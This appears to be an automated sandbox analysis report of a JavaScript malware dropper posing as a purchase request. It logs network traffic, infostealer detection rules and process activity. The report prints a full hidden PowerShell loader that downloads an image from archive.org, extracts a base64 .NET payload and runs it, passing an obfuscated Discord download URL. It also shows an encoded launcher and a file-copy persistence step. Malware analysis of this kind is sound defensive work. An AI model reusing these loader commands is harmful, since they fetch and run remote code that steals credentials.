                      Source: global traffic    HTTP traffic detected: GET /attachments/1277433180093157459/1277662781419552829/ORIG.txt?ex=66cdfbb0&is=66ccaa30&hm=d1c475c40c3b46b0e27e96cbd9d311f2634d5d9ee85c92712f601947bf5e518f& HTTP/1.1  Host: cdn.discordapp.com  Connection: Keep-Alive
                      Source: global traffic    HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1  Host: ip-api.com  Connection: Keep-Alive
                      Source: Joe Sandbox View    IP Address: 207.241.227.86
                      Source: Joe Sandbox View    IP Address: 208.95.112.1
                      Source: Joe Sandbox View    ASN Name: INTERNET-ARCHIVEUS
                      Source: Joe Sandbox View    ASN Name: TUT-ASUS
                      Source: Joe Sandbox View    ASN Name: COMPUTERLINEComputerlineSchlierbachSwitzerlandCH
                      Source: Joe Sandbox View    ASN Name: CLOUDFLARENETUS
                      Source: Joe Sandbox View    JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknown    DNS query: name: ip-api.com
                      Source: unknown    UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global traffic    DNS traffic detected: DNS query: ia601606.us.archive.org
                      Source: global traffic    DNS traffic detected: DNS query: cdn.discordapp.com
                      Source: global traffic    DNS traffic detected: DNS query: ip-api.com
                      Source: global traffic    DNS traffic detected: DNS query: smtp.zoho.eu
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3315900274.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmp    String found in binary or memory: http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE80553000.00000004.00000800.00020000.00000000.sdmp    String found in binary or memory: http://cdn.discordapp.com
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3315900274.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmp    String found in binary or memory: http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p
                      Source: powershell.exe, 00000004.00000002.2143156846.000001CEE960F000.00000004.00000020.00020000.00000000.sdmp    String found in binary or memory: http://crl.v
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmp    String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE81638000.00000004.00000800.00020000.00000000.sdmp    String found in binary or memory: http://ia601606.us.archive.org
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.00000000029E1000.00000004.00000800.00020000.00000000.sdmp    String found in binary or memory: http://ip-api.com
                      Source: powershell.exe, 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmp    String found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE819FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmp    String found in binary or memory: http://nuget.org/NuGet.exe
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmp    String found in binary or memory: http://ocsp.digicert.com0B
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmp    String found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000002.00000002.2153683025.000001DCD5291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE80001000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.00000000029E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.zoho.eu
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3315900274.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://status.thawte.com0:
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html0
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3315900274.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: powershell.exe, 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: powershell.exe, 00000002.00000002.2153683025.000001DCD521A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                      Source: powershell.exe, 00000002.00000002.2153683025.000001DCD525F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE80439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE80439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1277433180093157459/1277662781419552829/ORIG.txt?ex=66cdfbb0&
                      Source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE8188A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE80F7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE80F7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601606.us.arXR(
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE80223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2105359169.000001CE80F7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601606.us.archive.org
                      Source: powershell.exe, 00000002.00000002.2153683025.000001DCD5A1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601606.us.archive.org/10/items/deathnote
                      Source: powershell.exe, 00000004.00000002.2142357124.000001CEE90E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE819FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2121822566.000001CE9007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                      Source: powershell.exe, 00000004.00000002.2105359169.000001CE81680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                      Source: InstallUtil.exe, 00000008.00000002.3317780029.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AFE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3317780029.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.3330752912.0000000005AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownHTTPS traffic detected: 207.241.227.86:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49705 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, gmBpn1ecBmQ.cs | .Net Code: cTytqmH

                      System Summary

                      Source: 4.2.powershell.exe.1ce9038cb90.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 768, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 1964, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 10876
                      Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? 
V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB?
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF848D35FD8 | 4_2_00007FF848D35FD8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF848E0091E | 4_2_00007FF848E0091E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_00BC41F0 | 8_2_00BC41F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_00BCA568 | 8_2_00BCA568
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_00BC4AC0 | 8_2_00BC4AC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_00BCEDBA | 8_2_00BCEDBA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_00BCAD28 | 8_2_00BCAD28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_00BC3EA8 | 8_2_00BC3EA8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_060F2428 | 8_2_060F2428
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_060FE048 | 8_2_060FE048
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_061066C0 | 8_2_061066C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_06102430 | 8_2_06102430
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_0610C250 | 8_2_0610C250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_06105258 | 8_2_06105258
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_0610B300 | 8_2_0610B300
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_06107E50 | 8_2_06107E50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_06107770 | 8_2_06107770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_0610E470 | 8_2_0610E470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_06100040 | 8_2_06100040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_061059C0 | 8_2_061059C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_06100007 | 8_2_06100007
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 8_2_06100038 | 8_2_06100038
                      Source: RFQ448903423_MAT_HASUE_de_Mexico.js | Initial sample: Strings found which are bigger than 50
                      Source: 4.2.powershell.exe.1ce9038cb90.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Process Memory Space: powershell.exe PID: 768, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 1964, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, roEs93G.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, roEs93G.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, JQn0Aia1.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, JQn0Aia1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.powershell.exe.1ce9038cb90.1.raw.unpack, YsrmZ97b.cs | Cryptographic APIs: 'TransformFinalBlock'
                      Source: powershell.exe, 00000004.00000002.2140899724.000001CEE7709000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .CMD;.VBp
                      Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winJS@13/5@4/4
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufxbwwa2.wao.ps1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: RFQ448903423_MAT_HASUE_de_Mexico.js | Virustotal: Detection: 13%
                      Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? 